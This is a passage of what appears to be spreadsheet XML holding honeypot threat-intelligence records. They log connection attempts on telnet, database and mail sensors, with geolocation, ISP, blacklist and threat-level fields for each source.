    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:24e9:dd68"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2921"/>
    <x v="2921"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T04:01:22"/>
    <d v="2025-04-06T02:44:39"/>
    <d v="2025-04-06T04:01:22"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Jurong East)"/>
    <s v="1880252"/>
    <s v="609606"/>
    <s v="1.32525"/>
    <s v="103.749"/>
    <s v="4773"/>
    <s v="M1 LIMITED"/>
    <s v="M1 LIMITED"/>
    <s v="business"/>
    <s v="M1 Ltd"/>
    <s v="2010-01-12"/>
    <s v="M1Net"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af9c:d36a"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2922"/>
    <x v="2922"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T04:00:51"/>
    <d v="2024-07-08T17:41:00"/>
    <d v="2025-04-06T04:00:51"/>
    <n v="11135"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;45521&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:b889"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2923"/>
    <x v="2923"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T03:25:33"/>
    <d v="2025-04-04T03:44:05"/>
    <d v="2025-04-06T03:25:33"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PB"/>
    <s v="Paraíba"/>
    <s v="João Pessoa"/>
    <s v="João Pessoa"/>
    <s v="3397277"/>
    <s v="NA"/>
    <s v="-7.115"/>
    <s v="-34.8631"/>
    <s v="267233"/>
    <s v="Set Sistemas de Seg. Elet. e Telecomunicações"/>
    <s v="Set Sistemas de Seg. Elet. e Telecomunicações"/>
    <s v="cellular"/>
    <s v="Set Sistemas de Seg. Elet. e Telecomunicações"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de7:3caa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2924"/>
    <x v="2924"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T03:08:12"/>
    <d v="2025-04-06T03:08:12"/>
    <d v="2025-04-06T03:08:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f0:ff4f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2925"/>
    <x v="2925"/>
    <s v="114-43-25-253.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T03:01:20"/>
    <d v="2025-04-03T04:07:39"/>
    <d v="2025-04-06T03:01:20"/>
    <n v="154"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23&amp;&amp;48524&amp;&amp;NA&amp;&amp;42464"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:722b:19fd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2926"/>
    <x v="2926"/>
    <s v="NA&amp;&amp;32-217-51-132.bng02.wtrb.ct.frontiernet.net"/>
    <x v="0"/>
    <d v="2025-04-06T02:43:19"/>
    <d v="2025-04-06T02:39:01"/>
    <d v="2025-04-06T02:43:19"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CT"/>
    <s v="Connecticut"/>
    <s v="Greater Bridgeport Planning Region"/>
    <s v="Trumbull"/>
    <s v="4844459"/>
    <s v="06611"/>
    <s v="41.2429"/>
    <s v="-73.2007"/>
    <s v="46690"/>
    <s v="Southern New England Telephone Company and SNET America, Inc."/>
    <s v="Frontier Communications Solutions"/>
    <s v="residential"/>
    <s v="LDSL-D Frontier Communications Wallingford - CT"/>
    <s v="1990-05-30"/>
    <s v="SNET-AMERICA"/>
    <s v="2015-02-11"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:20d9:3384"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2927"/>
    <x v="2927"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T02:36:20"/>
    <d v="2025-04-06T02:36:20"/>
    <d v="2025-04-06T02:36:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:fb4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2928"/>
    <x v="2928"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T02:27:54"/>
    <d v="2025-04-06T02:27:54"/>
    <d v="2025-04-06T02:27:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:af0d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2929"/>
    <x v="2929"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T02:02:44"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-06T02:02:44"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:94cc"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2930"/>
    <x v="2930"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T01:53:38"/>
    <d v="2025-04-06T01:53:38"/>
    <d v="2025-04-06T01:53:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="18182"/>
    <s v="SONET-TW"/>
    <s v="Sony Network Taiwan Limited"/>
    <s v="consumer"/>
    <s v="Sonet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db55:5c68"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2931"/>
    <x v="2931"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T01:49:36"/>
    <d v="2025-04-04T21:46:58"/>
    <d v="2025-04-06T01:49:36"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="1433&amp;&amp;8443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="El Segundo"/>
    <s v="5345860"/>
    <s v="90245"/>
    <s v="33.919200000000004"/>
    <s v="-118.416"/>
    <s v="49544"/>
    <s v="i3D.net B.V"/>
    <s v="i3D.net B.V"/>
    <s v="business"/>
    <s v="i3Dnet dedicatedservers uslax1"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': 'www', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2f5:cef2"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2932"/>
    <x v="2932"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T01:39:51"/>
    <d v="2025-04-06T01:39:05"/>
    <d v="2025-04-06T01:39:51"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CMX"/>
    <s v="Mexico City"/>
    <s v="Benito Juárez  Borough"/>
    <s v="Benito Juarez"/>
    <s v="3827406"/>
    <s v="NA"/>
    <s v="19.3984"/>
    <s v="-99.1577"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="residential"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bdef:82df"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2933"/>
    <x v="2933"/>
    <s v="218-166-209-52.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T01:27:24"/>
    <d v="2025-04-05T11:53:25"/>
    <d v="2025-04-06T01:27:24"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23"/>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2002-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa6:d134"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2934"/>
    <x v="2934"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T01:23:33"/>
    <d v="2025-04-06T00:30:41"/>
    <d v="2025-04-06T01:23:33"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Harris"/>
    <s v="Houston"/>
    <s v="4699066"/>
    <s v="77052"/>
    <s v="29.7604"/>
    <s v="-95.3698"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext HOU"/>
    <s v="2011-12-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2513:dd96"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2935"/>
    <x v="2935"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T00:39:47"/>
    <d v="2025-04-06T00:39:47"/>
    <d v="2025-04-06T00:39:47"/>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3b5c:ac47"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2936"/>
    <x v="2936"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T00:36:42"/>
    <d v="2025-04-06T00:36:42"/>
    <d v="2025-04-06T00:36:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:ba87"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2937"/>
    <x v="2937"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T23:51:15"/>
    <d v="2025-04-04T14:23:47"/>
    <d v="2025-04-05T23:51:15"/>
    <n v="959"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1"/>
    <s v="25"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WA"/>
    <s v="Washington"/>
    <s v="King"/>
    <s v="Seattle (Queen Anne)"/>
    <s v="5809844"/>
    <s v="98121"/>
    <s v="47.6183"/>
    <s v="-122.358"/>
    <s v="21743"/>
    <s v="Atlas Networks Corporation"/>
    <s v="Atlas Networks Corporation"/>
    <s v="business"/>
    <s v="SolaDrive"/>
    <s v="2019-12-19"/>
    <s v="ATLAS-45-ARIN"/>
